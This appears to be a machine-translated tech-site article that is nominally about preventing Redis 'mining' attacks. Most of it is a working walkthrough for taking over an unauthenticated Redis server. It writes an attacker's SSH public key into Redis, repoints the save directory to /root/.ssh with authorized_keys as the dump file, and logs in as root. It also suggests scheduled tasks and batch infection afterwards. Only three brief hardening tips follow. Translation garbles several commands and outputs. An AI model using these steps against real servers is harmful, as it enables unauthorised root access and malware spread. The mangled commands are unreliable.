Shulou(Shulou.com)05/31 Report--

Most people do not understand the knowledge points of this article "how to prevent Redis mining", so the editor summarizes the following content, detailed content, clear steps, and has a certain reference value. I hope you can gain something after reading this article. Let's take a look at this article "how to prevent Redis mining".

First of all, we need some prerequisites.

Condition 1: you must first have a Redis, and we need to know its port [default 6379]

Condition 2: the password of Redis must not be too complex or have no password.

Condition 3: the user who starts Redis had better be the Root user, which is more destructive.

2. Start making trouble

2.1 create a pair of keys

Generate a pair through ssh-keygen, and of course you can use what you already have.

Root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair.Enter file in which to save the key (/ root/.ssh/id_rsa): / tmp/rediskey/id_rsa

Next, the attack key value is generated through the public key.

(echo-e "\ n\ n"; cat id_rsa.pub; echo-e "\ n\ n";) > foo.txt

The contents are as follows

Root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

Two newline characters are added here to prevent data from being joined together and causing invalidation problems.

2.2 configure Key to Redis

Do the following:

Root@kali:/tmp/rediskey# cat foo.txt | redis-cli-h 192.168.243.129-x set barOK

Log in to Redis to check if it has been written to Redis.

Root@kali:/tmp/rediskey# redis-cli-h 192.168.243.129192.168.243.129 nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali 6379 > get bar "\ n\ n\ nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\ n\ n"

2.3 replace system files through Redis save mechanism

Let's look at the following

192.168.243.129 dir 6379 > config set dir / root/.sshOK192.168.243.129:6379 > config get dir1) "dir" 2) "/ root/.ssh" 192.168.243.129 dir 6379 > config set dbfilename "authorized_keys" OK192.168.243.129:6379 > saveOK192.168.243.129:6379 > exit

At this time, let's log in to the remote host to see the effect.

Root@kali:/tmp/rediskey# ssh-I id_rsa root@192.168.243.129The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.Are you sure you want to continue connecting (yes/no)? YesWarning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.Linux kali 4.19.0-kali3-amd64 # 1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1root@kali:~# w

OK, we have successfully promoted the rights here, so let's take a look at what the export file is. In fact, it is just the saved file form of Redis. If you are interested, you can open it and have a look. It is no longer shown here.

3. How to prevent

This loophole is still quite powerful. Now we only get the host permission, add it to the scheduled task and execute some scripts and then batch infect it.

The prevention techniques are as follows:

Redis do not listen on dangerous IP. If so, please add firewall control.

Redis must increase the password limit, and cannot be a weak password

Redis should try not to start as a Root user.

To achieve the above three points to prevent Redis mining, there is no problem

The above is about the content of this article on "how to prevent Redis mining". I believe we all have a certain understanding. I hope the content shared by the editor will be helpful to you. If you want to know more about the relevant knowledge, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.